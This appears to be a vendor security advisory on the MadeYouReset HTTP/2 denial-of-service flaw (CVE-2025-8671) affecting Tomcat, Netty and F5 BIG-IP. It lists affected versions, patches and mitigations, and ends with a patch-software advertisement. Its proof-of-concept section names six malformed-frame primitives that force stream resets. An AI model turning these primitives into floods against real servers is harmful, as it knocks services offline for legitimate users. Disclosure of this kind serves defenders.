A novel attack technique named MadeYouReset has been discovered, targeting multiple implementations of the HTTP/2 protocol. This flaw, sitting at a comfortable 7.5 on the CVSS scale, allows attackers to bypass existing mitigations and launch significant denial-of-service (DoS) attacks. The vulnerability is especially concerning because it circumvents the standard server-imposed limit of 100 concurrent HTTP/2 requests per TCP connection, which is designed to prevent DoS attacks.
Vulnerability Details
The CVE-2025-8671 identifier has been assigned to this generic vulnerability, which impacts several products, including Apache Tomcat (CVE-2025-48989), F5 BIG-IP (CVE-2025-54500), and Netty (CVE-2025-55163). The MadeYouReset vulnerability allows attackers to exploit malformed HTTP/2 control frames and send thousands of requests, overwhelming the server and causing denial-of-service conditions for legitimate users. In some cases, this can cause significant increases in CPU usage and even lead to out-of-memory crashes.
This “MadeYouReset” attack is an evolution of the “Rapid Reset” attack from 2023 but circumvents the mitigations that were deployed against the earlier threat by manipulating servers into stream resets via crafted malformed frames.
Root Cause
The root cause of MadeYouReset lies in a mismatch between the HTTP/2 specifications and the internal architectures of many real-world web servers. This discrepancy leads to resource exhaustion, which attackers can exploit to trigger a DoS attack. The vulnerability leverages the fact that the RST_STREAM frame is used both for client-initiated cancellation and to signal stream errors.
Proof of Concept (PoC)
To trigger the RST_STREAM frames on the server, attackers can use the following primitives:
1. WINDOW_UPDATE frame with an increment of 0
2. PRIORITY frame whose length is not 5 (the only valid length for it)
3. PRIORITY frame that makes a stream dependent on itself
4. WINDOW_UPDATE frame with an increment that makes the window exceed 2^31 - 1 (the largest window size allowed)
5. HEADERS frame sent after the client has closed the stream (via the END_STREAM flag)
6. DATA frame sent after the client has closed the stream (via the END_STREAM flag)
By sending carefully crafted frames that trigger protocol violations, the server is prompted to reset the stream by issuing an RST_STREAM.
Affected Products
The vulnerability affects multiple products:
F5 BIG-IP (CVE-2025-54500):
- BIG-IP 17.x (versions 17.5.0-17.5.1 and 17.1.0-17.1.2)
- BIG-IP 16.x (versions 16.1.0-16.1.6)
- BIG-IP 15.x (versions 15.1.0-15.1.10)
- BIG-IP Next products (version 20.3.0 and various SPK, CNF, and Kubernetes implementations)
Apache Tomcat (CVE-2025-48989):
- Tomcat 11.0.0-M1 through 11.0.9
- Tomcat 10.1.0-M1 through 10.1.43
- Tomcat 9.0.0.M1 through 9.0.107
- Older, EOL versions might also be affected
Netty (CVE-2025-55163):
- Netty prior to 4.1.124.Final
- Netty prior to 4.2.4.Final
Other affected projects include h2o and swift-nio-http2.
Tactics, Techniques, and Procedures (TTPs)
Attackers exploit malformed HTTP/2 control frames to bypass the maximum concurrent streams limit. By crafting specific invalid control frames or violating protocol sequencing, attackers can force servers to generate RST_STREAM frames while backend systems continue processing requests.
- TA0040 – Impact: Exploit the vulnerability to cause a denial-of-service condition.
The specific technique and sub-technique employed are:
Impact & Exploit Potential
Successful exploitation of the MadeYouReset vulnerability can lead to severe consequences, including denial-of-service (DoS) conditions for legitimate users and, in certain scenarios, complete out-of-memory crashes on the targeted server. This vulnerability is actively being exploited in the wild, making it a critical concern for organizations using the affected products.
Mitigation & Recommendations
The flaw has been patched in Netty 4.1.124.Final and 4.2.4.Final, as well as Apache Tomcat 11.0.10, 10.1.44 and 9.0.108.
F5 has released engineering hotfixes for the 17.x and 16.x branches:
- Hotfix-BIGIP-17.5.1.0.80.7-ENG.iso
- Hotfix-BIGIP-17.1.2.2.0.259.12-ENG.iso
- Hotfix-BIGIP-16.1.6.0.27.3-ENG.iso
For systems where patching is not immediately feasible, F5 recommends disabling HTTP/2 and reverting to HTTP. Other mitigation strategies include implementing BIG-IP ASM/Advanced WAF DoS protection profiles with TPS and stress-based attributes, including Behavioral DoS Detection and Mitigation capabilities. System administrators should also monitor HTTP/2 profile statistics for signs of attack, such as high numbers of RST_STREAM frames sent and WINDOW_UPDATE frames received.
Other generic recommendations include:
- Ensuring that your HTTP/2 implementations are up-to-date with the latest security patches.
- Implementing rate limiting to restrict the number of requests from a single client.
- Monitoring server resources and setting up alerts for unusual activity.
- Using a web application firewall (WAF) to filter out malicious requests.
Protecting against subtle, specification-compliant attacks like MadeYouReset is crucial, given that HTTP/2 is a fundamental component of modern web infrastructure.
Instantly Fix Risks with Saner Patch Management
Saner patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.
It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.
Experience the fastest and most accurate patching software here.